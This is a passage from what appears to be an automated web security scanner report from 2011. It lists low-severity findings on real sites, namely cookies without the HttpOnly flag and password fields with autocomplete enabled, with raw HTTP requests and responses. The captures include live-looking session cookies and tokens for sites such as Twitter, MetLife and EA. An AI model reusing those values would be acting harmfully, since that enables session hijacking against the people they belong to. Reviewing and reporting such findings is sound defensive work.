Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D; s_pers=%20s_getnr%3D1308924922785-New%7C1371996922785%3B%20s_nrgvo%3DNew%7C1371996922786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:24 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Fri, 24 Jun 2011 14:15:23 GMT

GIF87a.............,...........D..;
13.80. http://www.mapquest.com/_svc/publishing/promo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Content-Length: 60
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D

{"key":"traffic-sponsorship","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:22 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Fri, 24 Jun 2011 14:15:22 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Content-Length: 64
Date: Fri, 24 Jun 2011 14:15:21 GMT
Connection: close

{"data":{"text":"","eDate":""},"errors":null,"status":"SUCCESS"}
13.81. http://www.mapquest.com/_svc/searchio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:22 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Content-Length: 99945
Date: Fri, 24 Jun 2011 14:15:22 GMT

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...
13.82. http://www.mapquest.com/cdn/_uac/adpage.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; s_pers=%20s_getnr%3D1308924922785-New%7C1371996922785%3B%20s_nrgvo%3DNew%7C1371996922786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; c_Id=MjQyOjQwNA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:26 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1308839292000"
Last-Modified: Thu, 23 Jun 2011 14:28:12 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Fri, 24 Jun 2011 14:15:25 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...
13.83. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D; s_pers=%20s_getnr%3D1308924922785-New%7C1371996922785%3B%20s_nrgvo%3DNew%7C1371996922786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:23 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1308839292000"
Last-Modified: Thu, 23 Jun 2011 14:28:12 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Fri, 24 Jun 2011 14:15:23 GMT

.PNG
.
...IHDR...,.........J3......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b...?.P..C..,+'..Z.& ...~Pz .w >..w.q.1.o.b.A...@\.b0.P ....cA...=p9..7... K.8...M...as.=....RB....13...r..BbB...\..y
...[SNIP]...
13.84. http://www.mapquest.com/icons/stop.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /icons/stop.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D; s_pers=%20s_getnr%3D1308924922785-New%7C1371996922785%3B%20s_nrgvo%3DNew%7C1371996922786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:23 GMT; Path=/
Last-Modified: Thu, 23 Jun 2011 14:28:10 GMT
Expires: Fri, 24 Jun 2011 14:39:23 GMT
Content-Type: image/png
Date: Fri, 24 Jun 2011 14:15:23 GMT
Content-Length: 923

.PNG
.
...IHDR.............e/O]...bIDATx....K.Q..p!.......B..H...x.LM!..m....L.i*....y...-.."...@0....YI.."J...5...wv6...[.m.e...9.....9...8....WN`Na$<t..[..0)f..5C..Y......L.TH.$.^[....
..M.{).%...
...[SNIP]...
13.85. http://www.metlife.com/system/css/components_home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/css/components_home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/css/components_home.css HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: siscweb=XUPOLRS172.24.35.19CKMQQ; path=/
Last-Modified: Sat, 14 May 2011 03:10:35 GMT
Content-Type: text/css
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:22 GMT
Vary: Accept-Encoding
Content-Length: 25960

@import url(/system/css/rcpromo.css);
/*------------------------------Banner-------------------------------------*/
#ctBanner img
{
   display: block;
   border:0px;
}
/*---------------------------
...[SNIP]...
13.86. http://www.metlife.com/system/css/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/css/global.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/css/global.css HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: siscweb=XUPOLRS172.24.35.23CKMOL; path=/
Last-Modified: Sat, 14 May 2011 03:10:35 GMT
Content-Type: text/css
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:22 GMT
Vary: Accept-Encoding
Content-Length: 62255

@import url(/system/css/reset.css);
@import url(/system/css/components.css);

/* Defaults */
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 81.25%; /* 13 px or 81.25% */
line-h
...[SNIP]...
13.87. http://www.metlife.com/system/js/vendor/optimost.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/js/vendor/optimost.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/js/vendor/optimost.js HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: siscweb=XUPOLRS172.24.35.20CKMOU; path=/
Last-Modified: Sat, 14 May 2011 02:50:18 GMT
Content-Type: application/x-javascript
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:22 GMT
Vary: Accept-Encoding
Content-Length: 2154

// OPTIMOST PAGE CODE V2.7 - Copyright 2002-2009 Interwoven, Inc.
var optimost={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"tex
...[SNIP]...
13.88. http://www.onlinecomcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinecomcast.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw HTTP/1.1
Host: www.onlinecomcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: WebsiteAliasID=2720; domain=www.onlinecomcast.com; path=/
Set-Cookie: strRefer=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: strEntryURL=http://www.onlinecomcast.com/default.aspx?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: AffID=1092; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: SubID=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: Promo=G-1092; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: Referrer=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: EntryURL=http://www.onlinecomcast.com/default.aspx?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: CampaignID=20134; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:30:11 GMT
Content-Length: 79956


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Comcast Cabl
...[SNIP]...
13.89. http://www.sdc.exxonmobil.com/dcsvakn9g8s9lijdbimge5rk6_8p6d/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdc.exxonmobil.com
Path:   /dcsvakn9g8s9lijdbimge5rk6_8p6d/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsvakn9g8s9lijdbimge5rk6_8p6d/dcs.gif?&dcsdat=1308922103994&dcssip=web.sa.mapquest.com&dcsuri=/mobil1/&dcsqry=%3Ftempset=search&dcsref=http://exxon.com/USA-English/GFM/lubricants.aspx&WT.tz=-5&WT.bh=8&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=ExxonMobil:%20Find%20Mobil%201%20Oil&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1057x822&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=web.sa.mapquest.com/mobil1/&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: www.sdc.exxonmobil.com
Proxy-Connection: keep-alive
Referer: http://web.sa.mapquest.com/mobil1/?tempset=search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:a2d"
Server: Microsoft-IIS/6.0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNTM2NjE3Njk2LjMwMTU5NDc0AAAAAAABAAAACQAAAACSBE73kAROAQAAAAEAAAAAkgRO95AETgEAAAAJAAAAIzE3My4xOTMuMjE0LjI0My0yNTM2NjE3Njk2LjMwMTU5NDc0; path=/; expires=Mon, 21-Jun-2021 13:32:48 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Fri, 24 Jun 2011 13:32:48 GMT
Connection: close

GIF89a.............!.......,...........D..;
14. Password field with autocomplete enabled  previous  next
There are 10 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. https://customersupport.ea.com/loginapp/cp/login.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customersupport.ea.com
Path:   /loginapp/cp/login.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /loginapp/cp/login.do?skin=ea&locale=en_US&curl=http://support.ea.com/app/home&surl=http://support.ea.com/ci/pta/login&p_next_page=redirect_users%2Fnextlink%2F3 HTTP/1.1
Host: customersupport.ea.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BBB74202101D3C876CD484EC760E7696.TomcatC; CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:45 GMT
Server: Apache/2.0.59 (Unix) mod_jk/1.2.23
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 9523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                           <!DOCTYPE
...[SNIP]...
</script>
<form name="loginForm" method="post" action="/loginapp/cp/login.do" onsubmit="return submitForm();"><div>
...[SNIP]...
<td>
   <input type="password" name="password" maxlength="50" tabindex="2" class="formText" style="width:70%;" value="" />
</td>
...[SNIP]...
14.2. http://everquest2.com/free_to_play  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...
14.3. https://store.playstation.com/external/index.vm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.playstation.com
Path:   /external/index.vm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /external/index.vm?returnURL=http://www.ea.com/profile/psn-login&locale=en_US HTTP/1.1
Host: store.playstation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; mbox=check#true#1308858991|session#1308858899721-95544#1308860791|PC#1308858899721-95544.17#1310068531; APPLICATION_SITE_URL=http%3A//us.playstation.com/support/answer/index.htm%3Fa_id%3D2360; s_pers=%20gpv_pageName%3DPS/SUPPORT/ANSWER/2360%7C1308860739047%3B%20s_nr%3D1308858939053-Repeat%7C1340394939053%3B%20s_pv%3DPS/SUPPORT/ANSWER/2360%7C1308860739059%3B

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:46:15 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Length: 3277


<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico" />
<title>Login</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link type="text/css" rel="stylesheet
...[SNIP]...
<div id="container" style="text-align:center;">
       <form method="post" action=https://store.playstation.com/j_acegi_external_security_check?target=/external/login.action id="mainform" name="mainform" class="loginBox">
               <input type="hidden" name="struts.token.name" value="struts.token" />
...[SNIP]...
</label>
<input class="textField" id="password" name="j_password" type="password"/>
<br style="clear:both;" />
...[SNIP]...
14.4. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; k=173.193.214.243.1308571866345827; guest_id=13086187569807267; js=1; __utma=43838368.1598605414.1305368954.1308844594.1308913365.9; original_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D; external_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D%7C0; _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg5yZXR1cm5fdG8iGmh0dHA6Ly90d2l0dGVyLmNvbS9lYToP%250AY3JlYXRlZF9hdGwrCK6D6MEwAQ%253D%253D--744fe172172cb84eb458a701d9523215936f73f5

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923299-83552-58119
ETag: "38bbda4ac10af72461fef915855f6997"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:48:19 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
